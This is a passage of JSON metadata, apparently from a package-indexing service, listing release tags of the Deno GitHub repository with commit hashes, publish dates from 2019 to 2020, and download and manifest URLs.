td/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.g